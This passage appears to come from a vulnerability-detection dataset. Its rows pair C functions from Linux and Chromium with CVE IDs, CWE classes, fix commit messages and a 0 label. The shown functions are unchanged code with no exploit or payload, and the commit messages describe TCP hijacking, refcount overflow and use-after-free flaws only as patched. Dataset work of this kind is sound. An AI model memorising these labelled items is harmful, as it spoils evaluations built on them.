(yielded < 0) { try--; if (!try) break; } } } kvm_vcpu_set_in_spin_loop(me, false); /* Ensure vcpu is not eligible during next spinloop */ kvm_vcpu_set_dy_eligible(me, false); }
void kvm_vcpu_on_spin(struct kvm_vcpu *me) { struct kvm *kvm = me->kvm; struct kvm_vcpu *vcpu; int last_boosted_vcpu = me->kvm->last_boosted_vcpu; int yielded = 0; int try = 3; int pass; int i; kvm_vcpu_set_in_spin_loop(me, true); /* * We boost the priority of a VCPU that is runnable but not * currently running, because it got preempted by something * else and called schedule in __vcpu_run. Hopefully that * VCPU is holding the lock that we need and will release it. * We approximate round-robin by starting at the last boosted VCPU. */ for (pass = 0; pass < 2 && !yielded && try; pass++) { kvm_for_each_vcpu(i, vcpu, kvm) { if (!pass && i <= last_boosted_vcpu) { i = last_boosted_vcpu; continue; } else if (pass && i > last_boosted_vcpu) break; if (!ACCESS_ONCE(vcpu->preempted)) continue; if (vcpu == me) continue; if (swait_active(&vcpu->wq) && !kvm_arch_vcpu_runnable(vcpu)) continue; if (!kvm_vcpu_eligible_for_directed_yield(vcpu)) continue; yielded = kvm_vcpu_yield_to(vcpu); if (yielded > 0) { kvm->last_boosted_vcpu = i; break; } else if (yielded < 0) { try--; if (!try) break; } } } kvm_vcpu_set_in_spin_loop(me, false); /* Ensure vcpu is not eligible during next spinloop */ kvm_vcpu_set_dy_eligible(me, false); }
C
linux
0
CVE-2014-3191
https://www.cvedetails.com/cve/CVE-2014-3191/
CWE-416
https://github.com/chromium/chromium/commit/11a4cc4a6d6e665d9a118fada4b7c658d6f70d95
11a4cc4a6d6e665d9a118fada4b7c658d6f70d95
Defer call to updateWidgetPositions() outside of RenderLayerScrollableArea. updateWidgetPositions() can destroy the render tree, so it should never be called from inside RenderLayerScrollableArea. Leaving it there allows for the potential of use-after-free bugs. BUG=402407 [email protected] Review URL: https://codereview.chromium.org/490473003 git-svn-id: svn://svn.chromium.org/blink/trunk@180681 bbb929c8-8fbe-4397-9dbb-9b2b20218538
void FrameView::scrollTo(const IntSize& newOffset) { LayoutSize offset = scrollOffset(); ScrollView::scrollTo(newOffset); if (offset != scrollOffset()) { updateLayersAndCompositingAfterScrollIfNeeded(); scrollPositionChanged(); } frame().loader().client()->didChangeScrollOffset(); }
void FrameView::scrollTo(const IntSize& newOffset) { LayoutSize offset = scrollOffset(); ScrollView::scrollTo(newOffset); if (offset != scrollOffset()) { updateLayersAndCompositingAfterScrollIfNeeded(); scrollPositionChanged(); } frame().loader().client()->didChangeScrollOffset(); }
C
Chrome
0
CVE-2016-5696
https://www.cvedetails.com/cve/CVE-2016-5696/
CWE-200
https://github.com/torvalds/linux/commit/75ff39ccc1bd5d3c455b6822ab09e533c551f758
75ff39ccc1bd5d3c455b6822ab09e533c551f758
tcp: make challenge acks less predictable Yue Cao claims that current host rate limiting of challenge ACKS (RFC 5961) could leak enough information to allow a patient attacker to hijack TCP sessions. He will soon provide details in an academic paper. This patch increases the default limit from 100 to 1000, and adds some randomization so that the attacker can no longer hijack sessions without spending a considerable amount of probes. Based on initial analysis and patch from Linus. Note that we also have per socket rate limiting, so it is tempting to remove the host limit in the future. v2: randomize the count of challenge acks per second, not the period. Fixes: 282f23c6ee34 ("tcp: implement RFC 5961 3.2") Reported-by: Yue Cao <[email protected]> Signed-off-by: Eric Dumazet <[email protected]> Suggested-by: Linus Torvalds <[email protected]> Cc: Yuchung Cheng <[email protected]> Cc: Neal Cardwell <[email protected]> Acked-by: Neal Cardwell <[email protected]> Acked-by: Yuchung Cheng <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static inline void tcp_in_ack_event(struct sock *sk, u32 flags) { const struct inet_connection_sock *icsk = inet_csk(sk); if (icsk->icsk_ca_ops->in_ack_event) icsk->icsk_ca_ops->in_ack_event(sk, flags); }
static inline void tcp_in_ack_event(struct sock *sk, u32 flags) { const struct inet_connection_sock *icsk = inet_csk(sk); if (icsk->icsk_ca_ops->in_ack_event) icsk->icsk_ca_ops->in_ack_event(sk, flags); }
C
linux
0
CVE-2019-11487
https://www.cvedetails.com/cve/CVE-2019-11487/
CWE-416
https://github.com/torvalds/linux/commit/6b3a707736301c2128ca85ce85fb13f60b5e350a
6b3a707736301c2128ca85ce85fb13f60b5e350a
Merge branch 'page-refs' (page ref overflow) Merge page ref overflow branch. Jann Horn reported that he can overflow the page ref count with sufficient memory (and a filesystem that is intentionally extremely slow). Admittedly it's not exactly easy. To have more than four billion references to a page requires a minimum of 32GB of kernel memory just for the pointers to the pages, much less any metadata to keep track of those pointers. Jann needed a total of 140GB of memory and a specially crafted filesystem that leaves all reads pending (in order to not ever free the page references and just keep adding more). Still, we have a fairly straightforward way to limit the two obvious user-controllable sources of page references: direct-IO like page references gotten through get_user_pages(), and the splice pipe page duplication. So let's just do that. * branch page-refs: fs: prevent page refcount overflow in pipe_buf_get mm: prevent get_user_pages() from overflowing page refcount mm: add 'try_get_page()' helper function mm: make page ref count overflow check tighter and more explicit
pipe_release(struct inode *inode, struct file *file) { struct pipe_inode_info *pipe = file->private_data; __pipe_lock(pipe); if (file->f_mode & FMODE_READ) pipe->readers--; if (file->f_mode & FMODE_WRITE) pipe->writers--; if (pipe->readers || pipe->writers) { wake_up_interruptible_sync_poll(&pipe->wait, EPOLLIN | EPOLLOUT | EPOLLRDNORM | EPOLLWRNORM | EPOLLERR | EPOLLHUP); kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN); kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT); } __pipe_unlock(pipe); put_pipe_info(inode, pipe); return 0; }
pipe_release(struct inode *inode, struct file *file) { struct pipe_inode_info *pipe = file->private_data; __pipe_lock(pipe); if (file->f_mode & FMODE_READ) pipe->readers--; if (file->f_mode & FMODE_WRITE) pipe->writers--; if (pipe->readers || pipe->writers) { wake_up_interruptible_sync_poll(&pipe->wait, EPOLLIN | EPOLLOUT | EPOLLRDNORM | EPOLLWRNORM | EPOLLERR | EPOLLHUP); kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN); kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT); } __pipe_unlock(pipe); put_pipe_info(inode, pipe); return 0; }
C
linux
0
CVE-2014-1713
https://www.cvedetails.com/cve/CVE-2014-1713/
CWE-399
https://github.com/chromium/chromium/commit/f85a87ec670ad0fce9d98d90c9a705b72a288154
f85a87ec670ad0fce9d98d90c9a705b72a288154
document.location bindings fix BUG=352374 [email protected] Review URL: https://codereview.chromium.org/196343011 git-svn-id: svn://svn.chromium.org/blink/trunk@169176 bbb929c8-8fbe-4397-9dbb-9b2b20218538
static void voidMethodOptionalStringArgMethod(const v8::FunctionCallbackInfo<v8::Value>& info) { TestObjectPython* imp = V8TestObjectPython::toNative(info.Holder()); if (UNLIKELY(info.Length() <= 0)) { imp->voidMethodOptionalStringArg(); return; } V8TRYCATCH_FOR_V8STRINGRESOURCE_VOID(V8StringResource<>, optionalStringArg, info[0]); imp->voidMethodOptionalStringArg(optionalStringArg); }
static void voidMethodOptionalStringArgMethod(const v8::FunctionCallbackInfo<v8::Value>& info) { TestObjectPython* imp = V8TestObjectPython::toNative(info.Holder()); if (UNLIKELY(info.Length() <= 0)) { imp->voidMethodOptionalStringArg(); return; } V8TRYCATCH_FOR_V8STRINGRESOURCE_VOID(V8StringResource<>, optionalStringArg, info[0]); imp->voidMethodOptionalStringArg(optionalStringArg); }
C
Chrome
0